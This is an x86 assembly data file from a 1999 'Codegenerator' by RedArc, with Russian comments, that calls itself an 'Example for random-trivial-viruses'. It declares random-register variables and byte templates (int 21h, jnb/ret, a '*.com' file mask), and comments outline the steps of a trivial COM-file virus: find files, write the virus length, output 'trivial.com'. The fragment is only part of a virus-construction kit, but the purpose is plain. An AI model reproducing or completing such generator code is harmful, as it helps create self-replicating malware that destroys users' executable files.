;Codegenerator (c) 1999 by RedArc

;Данные демонстратора

TEMP_L db ?
TEMP_H db ?

_1_TEMP_16 dw ?
_1_TEMP_L db ?
_1_TEMP_H db ?
_1_RND_8 db ?
_1_RND_16 dw ?
_1_RND_Reg8 db ?
_1_RND_Reg16 db ?
;---
_2_TEMP_16 dw ?
_2_TEMP_L db ?
_2_TEMP_H db ?
_2_RND_8 db ?
_2_RND_16 dw ?
_2_RND_Reg8 db ?
_2_RND_Reg16 db ?
;---
_3_TEMP_16 dw ?
_3_TEMP_L db ?
_3_TEMP_H db ?
_3_RND_8 db ?
_3_RND_16 dw ?
_3_RND_Reg8 db ?
_3_RND_Reg16 db ?

Punkt_1 dw ? ;mov dx,filename             √
Punkt_2 dw ? ;@1: int 21h                 √
Punkt_3 dw ? ;mov cx,virlen
Punkt_4 dw ? ;mov si,[@1]                 √
Punkt_5 dw ? ;filename db '*.com',0h      √

bytes_1:
        int 21h
bytes_1_length equ $-bytes_1
bytes_2:
        jnb @2
        ret
@2:
bytes_2_length equ $-bytes_2
bytes_3:
       ret
bytes_3_length equ $-bytes_3
bytes_4:
      db '*.com',0h
bytes_4_length equ $-bytes_4

;---
FileName db 'trivial.com',0h
msg db 'Codegenerator 1999 (c) RedArc',0ah,0dh
    db 'Example for random-trivial-viruses',0ah,0dh,'$'
